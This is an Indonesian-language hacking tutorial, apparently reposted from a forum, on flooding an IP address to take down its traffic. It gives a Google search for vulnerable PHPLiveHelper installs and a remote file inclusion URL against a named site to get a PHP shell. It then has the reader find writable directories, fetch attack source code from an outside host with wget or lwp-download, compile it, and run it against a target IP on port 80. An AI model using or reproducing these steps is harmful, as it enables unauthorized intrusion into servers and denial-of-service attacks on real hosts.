cara NeMbak Ip

Ini Tulisan Berasal Dari FoRum SebeLh DimAna TUtOrIal Ini TeNtaNG Cara NEmbak IP FunGSinya UnTUK MeNDowNKan SeBUah TRaFik DI Ja
 
 0o0 Pertama-tama Lo harus punya server yang siap inject [Klo' blom punya cari aja di Google. 
        th3sn0wbr4in punya nich sedikit target dan Bug-bug yang 'Mudah-mudahan' masih bisa dipake di sini
                  
        0o0 Untuk contoh ini gw pake Bug PHPLiveHelper dan Keyword untuk mencari targetnya di Google Gw coba 
        allinurl:"/PHPLiveHelper/*.php"
                  
        0o0 Gw coba salah satu hasil pencarian dari Google, yaitu http://www.maldivesrds.com/phplivehelper/mail.php?
                ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&livename=
                  
        0o0 Hapus tulisan /mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&
        livename= dan tambahkan Bug dibelakang alamat URL targetnya, sehingga alamat targetnya menjadi
               http://www.maldivesrds.com/phplivehelper/initiate.php?abs_path=http://freewebs.com/th3sn0wbr4in/tusuk.htm?
                  
        0o0 Nah...bisa di-inject kan...? Kita lihat UID - nya adalah nobody(99), gapapa dech...

        0o0 Cari Direktory yang bisa ditulis ama user nobody. Seperti biasa, ketik command linuxnya. Lo bisa ketik
               find / -type d -perm 777 atau find / -type d -user nobody nah nanti banyak tuch yang keluar...
           /* Maksud dari command 1 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, dengan permisi
        777 (rwx) untuk siapapun, termasuk user nobody  */
    /* Maksud dari command 2 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, milik user nobody.
        Karena pemilik Directory bisa melakukan apapun pada Directory miliknya  */
  Cari dibelakangnya ga' ada tulisan Permission Denied, copy dan paste di paste di Field Directory di PHPShell kamu
  dan [Enter]. Kalau semua ada tulisan Permission Denied, coba saja Directory /tmp, karena biasanya bermode 777.
  
        0o0 Download file untuk tembak dengan menggunakan wget. Ketik wget http://freewebs.com/th3sn0wbr4in/tembak.c.
        Jika wget tidak bisa digunakan (Command not found atau denied) gunakan lwp-download. 
        Ketik lwp-download http://freewebs.com/th3sn0wbr4in/tembak.c dan [Enter] aja langsung.
        Kalau anda menggunakan wget akan keluar keterangan di PHPShell lo, +- seperti ini :
  
   
  --02:39:51--  http://freewebs.com/th3sn0wbr4in/tembak.c
      => `tembak.c'
  Resolving freewebs.com... 38.119.100.2
  Connecting to freewebs.com[38.119.100.2]:80... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 3,744 [text/x-csrc]

      0K ...                                                   100%   30.89 KB/s

  02:39:51 (30.89 KB/s) - `Sambit.c' saved [3764/3764]

  Nah, kalau udah muncul tulisan saved berarti udah kedownload filenya...
        0o0 Compile file tembak.c tadi biar jadi file Executeable (kalau di WinDo$t Ekstensinya .exe kalau di Linux
         tidak menggunakan Ekstensi). 
                Ketik gcc tembak.c -o tembak
                Maksud Command di atas adalah menjalankan gcc, compile file tembak.c (Source Code C) dengan Output
  file bernama tembak. Jadi nama tembak bisa lo ganti sesuai selera
            
        0o0 Nah...sekarang, jalankan file tembak tadi. Ketik apa...? 
 
        0o0  ./tembak 219.83.4.68 80
                   0x01 ./ adalah Directory tempat kita menaruh file tembak
                   0x02 219.83.4.68 IP Warnet tempat gw maen
                   0x03 80 No Port. 80 untuk HTTP a.k.a Browsing
                           Untuk apa itu port. Stop tanya terus, buka Google! Cari yang ingin Lo cari!
      

These icons link to social bookmarking sites where readers can share and discover new web pages.

• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 

Tags: Hacking